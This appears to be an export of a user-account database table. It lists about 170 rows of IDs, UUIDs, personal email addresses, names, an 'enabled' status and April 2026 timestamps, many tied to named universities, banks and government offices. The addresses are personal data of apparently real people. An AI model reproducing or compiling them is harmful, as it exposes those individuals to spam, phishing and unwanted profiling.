76 60aac34a-c364-4f41-b6cb-72604de99cc1 sven.damm@volteuropa.org Sven Damm null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
77 a311b4f4-4402-4b79-9d14-b26207b9e5db marc.puskaric@gmail.com Marc Puskaric null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
78 e8264105-4239-4772-8616-296a7f7d3503 katharina.loebl@kfw.de Katharina Loebl null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
79 47869060-14ff-447e-bb82-12f1b078b4dc manuela.schmidt@kit.edu Manuela Schmidt null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
80 632ec1d5-0c16-4d46-abe6-f20d0a2405f1 claudia.reinprecht@bmeia.gv.at Claudia Reinprecht null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
82 7549618b-4342-4ddc-ad5d-50fb7e9a3ed4 moser@foryoursight.com Moser null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
83 7d476fc7-4435-4511-85b0-c1b8b918c4ce anke.herodek@gmail.com Anke Herodek null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
85 5df60554-2f7b-4017-830d-15a3e3ea5ef5 isabell@change4punkt0.de Isabell null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
86 10bc4d97-e2cf-49bb-9fc3-84f702576fa5 michelle.mallwitz@tu-darmstadt.de Michelle Mallwitz null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
87 b6a634aa-1958-4e26-9174-1c7cf94e8054 valenrg@gmail.com Valenrg null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
88 beafefd4-e473-4799-a975-40105592aef8 nicole_behringer@web.de Nicole_behringer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
89 aff51d3f-b307-4be2-8ab1-40a1be803677 stephan-raab@web.de Stephan Raab null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
90 d164c7d8-fe83-49c3-bc16-e7f304cd9f0a janaalina@hotmail.de Janaalina null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
91 a61f9dc0-8e13-4693-bb8a-ec2bc146ac25 maren.gessner@gmx.de Maren Gessner null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
92 3a7d1221-7a27-486e-bf2e-1b9497af5f31 sirkka@sirkkafreigang.com Sirkka null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
93 abb96719-cbe7-42e2-845e-b7bd68afe413 nele.fischer@online.de Nele Fischer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
94 efe037ef-7d8c-45c8-813f-e67cbc291fc6 kathrinko@gmail.com Kathrinko null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
95 f5f1255c-73ac-4a21-9e78-439d3963f14d justus.lewald@posteo.de Justus Lewald null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
96 dfc1dbcc-e5f1-4c21-a112-b914fa1ead8a f.hardering@fh-muenster.de F Hardering null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
97 fed4e5e3-d24a-4324-8ca2-0626c5b05eb8 michael.shamiyeh@c-fd.eu Michael Shamiyeh null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
98 bfaf28eb-cf6f-4c5a-aa56-04114f78bd6b basislager@kzwei.org Basislager null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
99 2af13db2-3b26-4b51-982f-d8d8b18816a5 zeckrachristoph@gmail.com Zeckrachristoph null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
100 db12a19d-cdf9-47c6-a8f2-3c95824389af annademezzo@gmail.com Annademezzo null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
101 6c7b8448-def2-4c13-9184-77742536305f nora@co-co-co.org Nora null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
102 0626c6bc-31dd-4537-b4b2-7c83e569d3f9 johanneswirz.mail@gmail.com Johanneswirz Mail null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
103 1d6449ee-b996-4184-a0a1-996743ae81c2 evalihotzky@gmx.de Evalihotzky null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
104 a4ff985a-2ab7-467a-8b83-b00568584868 matthiasbinder@outlook.com Matthiasbinder null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
105 bc08ef5d-e356-4334-97e5-86c61720dfe4 leupold.joerg@gmail.com Jörg Leupold null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
107 f4aaddf4-5f92-448b-b20e-b1059c9f2acc elke.nickel@gmx.de Elke Nickel null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
108 fee8fe8d-cc53-456c-9de9-16cbd50cc671 hellofelicitas@googlemail.com Hellofelicitas null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
109 35c9b876-892a-4bc5-9abb-363c2585beda simone.kimpeler@isi.fraunhofer.de Simone Kimpeler null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
110 3b24bb96-1db0-438c-81ea-33b5625db84e ima@miraklejo.de Ima Johnen null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
111 b7855432-8d81-46df-ad9b-223036e5ada3 filip.maric@uit.no Filip Maric null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
112 ca47977b-4390-4192-8c5c-d603a79d3b37 zinaburgers@gmail.com Zinaburgers null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
113 19fbd53e-3933-4905-92a9-35af428596fb f.fischer@human-insight.de F Fischer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
114 e33cb4bf-feae-4a41-a4cf-c135faab9859 k.froehlich@mail.de K Froehlich null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
115 a98a951b-17dc-4b71-84e8-1edf913e56f2 jank@szenum.de Jank null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
116 3797e0cc-a8c4-417c-a90e-212842f3e258 cr@peopleinspired.de Cr null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
117 c7f08caf-67d9-46b1-a239-774743dc1d98 antje.bierwisch@mci.edu Antje Bierwisch null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
118 ad997185-cc1e-447b-a281-775f90bce608 gerhard.schoenhofer@thi.de Gerhard Schoenhofer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
119 42209dd3-370d-4126-9794-be2c3544a77f tisto@posteo.de Tisto null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
120 8a76f8c9-d67a-486f-be49-5501bc25275a mihaelaghisa@gmail.com Mihaelaghisa null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
121 4940767c-2ec7-40ac-b03a-7e8f58775bbc info@maikevandenboom.com Info null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
122 fa879255-f0b8-4547-93d1-e1aded0475db oettl.martina@gmail.com Oettl Martina null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
123 8d950a0b-d362-4f09-a6d3-beebdc43d2bd ek@foresight-solutions.com Ek null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
124 9e5122bd-7687-46e2-b8c0-daec2e72f80a christian.pfeiffer@zoho.com Christian Pfeiffer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
125 ed45b1be-0a9f-450f-a39d-faa20962665f joerg@komfortzonen.de Joerg null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
126 2e1e66e3-a281-4049-8747-367cde8eebe1 stephan.rey@tribolog.net Stephan Rey null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
127 996db25b-9b91-476f-84d5-a673673c0c17 elisabeth@junge-tueftler.de Elisabeth null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
128 262cf268-78e3-4b78-be2f-7a157e1212b2 susann.wagner@th-brandenburg.de Susann Wagner null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
129 e3543005-84cf-4554-aa11-63cd60ecce02 mseneque@gmail.com Mseneque null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
130 510acebb-f84e-4c5f-9254-09875448122e sebastian.bollien@baks.bund.de Sebastian Bollien null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
131 18f619a5-9133-4af1-ba56-90ce59b29fab zabel@imaginis.agency Zabel null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
132 a1b5fd33-6345-4f27-b4f2-fb23ef6739a5 kontakt@slaemmer.de Kontakt null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
133 14b5c802-4cf0-4066-bff3-483243bc3d35 gfranc53@gmail.com Gfranc53 null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
134 447a535f-0338-4512-b845-c26f08a8af61 info@textimum.li Info null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
135 bb5186d6-b9ac-428a-a39d-a0965163f67c julius.rummich@posteo.de Julius Rummich null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
136 cb118a42-5311-4f7e-97b4-beadbefd320b andreas.mueller@politconsulting.ch Andreas Mueller null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
137 a2090040-9855-4e73-a950-668d6723ec5d cristian.lozaadaui@thi.de Cristian Lozaadaui null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
81 676fe9e6-cac6-4fca-89ca-cfc49a7f0126 mail@s-ollenburg.de Stefanie Ollenburg {} enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:27:58.77599+02
69 77c67afc-7fb5-4384-af0d-6f5e8c95f768 gregorreisch@googlemail.com Gregor Reisch null enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
138 31deac75-e43f-493d-9350-f69d64de9c70 felix.holtschoppen@heagmobilo.de Felix Holtschoppen null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
140 3ce319c6-080a-403c-8da6-d09e7083285b bruno.franceschini@xenien.net Bruno Franceschini null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
141 f4a2831c-3062-49d5-83c8-a82bbed82360 sicktheresa@gmail.com Sicktheresa null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
142 720a0016-b711-4e59-9609-0c392e284228 nina@digitalschoolstory.de Nina null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
143 b655d22e-6497-48da-b865-1aa96f70e962 valerie.voggenreiter@posteo.de Valerie Voggenreiter null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
144 3b7f392b-1672-4946-bea4-41cbe732a873 alexander.ple@iqib.de Alexander Ple null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
145 8bbf0cc5-a0c4-4328-9191-2a959958c523 philipp@blufink.com Philipp null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
146 569e4b13-37e1-4ea8-950a-b3f64c29ccb0 lmarijkew@gmail.com Lmarijkew null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
147 38713cce-1957-42a2-96df-09ddb657c6b9 dagmar.meyer@mac.com Dagmar Meyer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
148 40069ce7-e9e5-4e2a-877c-8b815438a3eb rebekka.bogner@hyve.net Rebekka Bogner null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
149 b558659a-f6a6-4bdf-bd7d-09d14e68ce54 jan.berlage@essential-futures.com Jan Berlage null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
150 30b48973-a484-497d-8f9a-610ba3a8fe7d clschuetze@yahoo.de Claudia Schütze null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
151 9ed6a673-e40a-4e0b-abe2-082a1938f814 jennieahuntley@gmail.com Jennie Huntley null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
152 cf65213c-7128-48d9-9d11-ec43ebf54fd0 dorothee.braun@baslerhofmann.ch Dorothée Braun null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
153 6945e7cd-e27f-462e-9a2e-3aa5ac5ac090 luca.landler@tirolwerbung.at Luca Landler null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
154 08bf32ee-40df-424a-8d8f-7523ab0838a7 katharina.koenig@th-brandenburg.de Katharina Koenig null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
155 ce67fecb-488b-46e0-8e4e-7738ad5d69c2 isabella@estuar.at Isabella null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
156 8b6ee2ec-fead-4d5b-a740-5b4e11482ef2 thomas.dapp@kfw.de Thomas Dapp null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
157 78b13d67-8259-446a-93dd-be201497997f utopiegestalten@web.de Utopiegestalten null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
158 3e70a24a-01b1-4183-b808-c33da0e8a3c5 janna.ji@posteo.de Janna Ji null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
159 4c7011a8-ce6d-409f-8d2e-40ab483d3de6 svenjatams1@gmail.com Svenjatams1 null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
160 222a5a0b-169a-426c-be42-11eb61a92a88 pariastella_namazi@yahoo.de Pariastella_namazi null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
161 989fb479-96f3-435e-8edb-33708668bdb9 daheim@future-impacts.de Daheim null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
162 dc81eee8-6166-41ed-a73b-14f194a17d51 laura.eigbrecht@dhbw-karlsruhe.de Laura Eigbrecht null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
163 ca391d73-7a12-47b0-bd1d-811db5f011cf a.menden@endeva.org A Menden null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
164 63a7c010-1017-4e77-b9b1-2cb4cefd8ae7 katharina.demelo@fh-wien.ac.at Katharina Demelo null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
165 c48df072-1923-4df5-87d8-8a9db2322c9d ina.schmidt@denkraeume.net Ina Schmidt null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
166 64535606-174f-479b-a11c-79907d9adddb garciaclarice@gmail.com Garciaclarice null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
167 eafc7d24-e209-4c59-8818-5fa13d2971c9 tanyaandersen22@gmail.com Tanya Andersen null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
168 3528f935-92f0-4be7-bd77-29ebe7709ff6 thorsten.werges@gmail.com Thorsten Werges null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
169 3061e35c-9865-4caf-a1f3-31ff05aa9fb5 annette_wiedemann@outlook.de Annette_wiedemann null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
171 5db19b42-5024-4132-b153-263919c97fe4 litherland@westzipfelregion.de Litherland null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
172 9b929fbc-aac2-45f7-9595-9759fc87218a post@sylvia-lipkowski.de Sylvia Lipkowski null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
173 0ede6d64-96ce-497b-ae1d-ccb2a04ce1e3 info@zielwerk.com Info null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
174 7fb985be-9316-4ec4-a18d-28d2a3e733c3 sabine.hein@dibev.org Sabine Hein null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
176 f7395b9d-373b-45bc-9ecc-66feb8474864 petragoran.pg@gmail.com Petragoran Pg null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
177 defe4b0b-73bd-4764-a92a-41331d64d10b info@mminelli.ch Info null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
178 5b34de8a-c6c0-49b7-bd5e-d26da6e5c7e5 anja.mozar@bundesbank.de Anja Mozar null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
179 4b7c93c6-dd15-44d8-b1c2-0cbba9d96461 s.hiller@balance.at S Hiller null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
180 3ebc6ba2-da44-4723-a503-21457c6121f8 maren.kottler@zh.ch Maren Kottler null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
181 b8c2ca6c-7ce5-4032-bc34-513a9a5c8532 lars@wortraub.com Lars null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
182 2a2e1024-f520-46ef-bd48-27c2a6808226 karin.wolf@kulturkonzepte.at Karin Wolf null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
183 d6b9d87b-d146-448c-942b-8f4c23b4adfc ower.stephan@gmail.com Ower Stephan null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
184 1613aaf1-b031-4e38-87f0-b5d27995e9d0 cb@sinnanstifterei.de Cb null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
185 4d11db2a-16dd-4a6c-82ad-b327866e6e4b martin.ciesielski@zukuenfte.net Martin Ciesielski null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
186 46e0bb08-fc55-4c39-9740-f48ae7db7e59 laurenz@prosumio.de Laurenz null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
187 132c32af-47a7-4845-a7ba-27257d6e2bf3 schuessler@machart.net Schuessler null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
188 d7240227-8f32-487d-85a8-2a4bbb796a9f barbara.hofleitner@collective-energy.at Barbara Hofleitner null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
189 2c83dd13-5e14-4771-83f7-938898548186 soldenhoff@curiousabout.ch Renato Soldenhoff null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
190 041bd6a8-3bee-4ac9-b2c6-722c66116f14 b.freitag@contur-online.de Birgit Freitag null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
191 fd9d7800-711b-4670-a1d1-cf2b929bf675 s.kutscheid@faco.de S Kutscheid null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
192 77d78467-b3d6-4e9f-bf86-4be456bb92e0 katharina.schenk@mailbox.org Katharina Schenk null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
193 6b17c6d0-c0ec-4fb0-b5a6-dbf3c41c68c6 thomas.nowak@qvantum.com Thomas Nowak null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
194 e5d522ac-b197-4a95-9076-a574252dcf1b birgit.wegerichbauer@gmail.com Birgit Wegerichbauer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
195 6541ddde-0ac5-4888-9979-9ebc936c654b mail@isabella-hermann.com Mail null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
196 8168ce05-9df9-4935-b93d-1ebb593b2cbc a.seubert@brandsandplaces.com A Seubert null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
197 6b5bdaa0-2a13-498d-847f-863f06542572 bettina.fruchtmann@googlemail.com Bettina Fruchtmann null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
198 e8fe623c-68f8-40e3-a602-b4c067526f91 ilona.arcaro@th-koeln.de Ilona Arcaro null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
199 60109034-081f-46d4-bdec-9b23c3c9f301 miriam_keller@gmx.ch Miriam Keller null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
200 d63101b1-df32-42a5-af64-1e502e9c7f42 stella@smillatech.com Stella Smiljkovic null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
201 39a1a3cf-8cca-4156-abf0-c26d8d5bbae6 kraft@kraft-feld.ch Kraft null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
202 879eb214-5c1a-4475-b79f-df8bf9af5277 tyokoi@hotmail.com Tyokoi null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
203 6395afaf-631f-41f3-9853-f8a1616fb033 nikolas.bm@gmx.de Nikolas Bm null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
204 1b9d81c7-ee96-45d8-9b12-039f619fb190 toni.buenemann@wb.uni-freiburg.de Toni Buenemann null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
205 f533f44f-c9de-47ee-b601-0d37e26f56c5 doreen@vasicek.net Doreen null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
206 59344e37-e621-49b4-92e1-6c332cb0a9c8 silviadamme@gmail.com Silviadamme null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
207 e73157c8-b643-4471-9401-60c68640c2b3 abaus@lindt.com Abaus null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
209 802d8ee9-75d2-4672-80c7-6df354af0529 stella.schaller@realutopien.de Stella Schaller null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
210 20ce5469-ebce-4ffe-ac03-d3d02f9bf20e dana.s0712@gmail.com Dana S0712 null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
211 7fed7333-6ffe-45eb-ab8d-3b5fe849650a mario.saladino@zh.ch Mario Saladino null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
212 1ebe6f33-410a-4a21-b75b-f8dcbab7a19e fraumonahille@gmail.com Fraumonahille null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
213 414b8bf6-d280-4f48-9800-ff8bfdb271b0 lena.tuenkers@fuonfutures.com Lena Tuenkers null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
214 0e972b13-90ee-45dc-95e8-fbf8c6cf524f charlesplath@gmail.com Charlesplath null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
215 47c2622a-8e97-45cf-913e-18d9064a18d8 sascha.dannenberg@fu-berlin.de Sascha Dannenberg null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
216 1fd85cb5-9162-4c30-b304-117b114a1234 gohl@weltethos-institut.org Gohl null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
217 183b5fa5-d270-4d95-b2ea-f0a9f812af88 stefan.wally@jungk-bibliothek.org Stefan Wally null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
218 615c8eae-aa67-430c-91d2-4a1b3f4c721f consulting@christianewilmes.com Consulting null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
219 06b7e132-28b9-4c6e-817d-15396d3958ac hello@jonas-voigt.com Hello null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
220 ded8f840-40b2-4594-9940-39ab1e3ecb2d gerhard.brandhofer@ph-noe.ac.at Gerhard Brandhofer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
221 ee3ba227-2857-4b03-ac8b-e3ab69d53698 kate.l.goodwin@gmail.com Kate L Goodwin null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
222 9fda69ac-ae09-435c-9af8-178eabefac92 leonie_hensgen@hotmail.com Leonie_hensgen null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
223 080cd947-6b59-45da-b1c3-f387d2857de1 slameczka@web.de Slameczka null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
224 c5442c5f-b875-473e-85c4-b20596f70e6a claudia.imfeld@zh.ch Claudia Imfeld null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
225 aa9ff47e-337a-45a3-b4ab-fc960ec9587e laura.kraeusel@hotmail.com Laura Kraeusel null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
226 50bbce96-1ca8-41dd-8e13-7e59fbb9ff58 an.caspari@gmail.com An Caspari null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
227 4055953d-866a-4b4b-bf5a-f3ee1f490aa6 rp@youtopiagroup.com Rp null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
228 00e06afc-09d0-4440-b4af-bb3e134116b0 carina.bussolera@thi.de Carina Bussolera null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
229 27b6679a-233e-48f4-8490-7474c4361024 valeriabf@icloud.com Valeriabf null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
230 26e8f3b8-f525-4524-93f2-bb349d577eef maria@goncalves.de Maria null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
231 1403c25c-479e-47b7-9d91-bb61e03877fc yesim.akkaya@gmx.at YeÅim Akkaya null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
232 9b5e7b7f-9e24-49be-a009-cad18ecf1dec iris@roomwithaview.at Iris null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
233 17a903f3-eeb7-40da-87fa-7ecb1568196c johannes.starke@tt-s.com Johannes Starke null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
234 2319fce4-f1ae-4810-8345-1106fcb61117 angelika.hauke@dguv.de Angelika Hauke null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
235 e671db54-7fe6-468c-99a9-476d6bb32bcd larissa.strohfuss@kfw.de Larissa Strohfuss null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
236 6d67c06c-bbee-41da-bc14-3a065f43da9f martin@geisenhainer.ch Martin null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
237 b677cb6b-028b-4022-bc14-27e558ec78f2 kerstineller@web.de Kerstineller null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
238 25ec0810-64c1-42c4-bcd0-4b6537c2b876 janne@jumpthegap.nl Janne null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
239 dca78473-3d26-4821-87b8-926399d5834a christa@schmid-meier.com Christa null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
240 df3d07b8-824d-4ead-b69a-906a4fca4b09 karoline.buenker@sandstorm.de Karoline Buenker null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
241 f9f2c5b6-a4c4-4dbd-b416-c4f66733d303 simone.brecht@yumuri.net Simone Brecht null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
242 bcb270e0-c705-4816-8231-82720f36dd58 karabo.mangena@saiia.org.za Karabo Mangena null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
243 4280158e-9bdc-4939-813b-6918de090c45 marikabauer@kabelmail.de Marikabauer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
244 c5487eaa-3d4c-43ab-b48d-41b1ba726df8 briere.anaelle@gmail.com Briere Anaelle null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
245 0ce44bb2-175c-40cb-9ede-1a8a4388d82b christian.wuehrer@tirolwerbung.at Christian Wuehrer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
246 cf5ef5dd-ff6d-45df-bd8d-745ba657cc2c office-chd@a1.net Office-Chd null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
247 f41f866f-b0c1-4827-816f-3518a27bcbbc c.loehle@sae.edu C Loehle null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
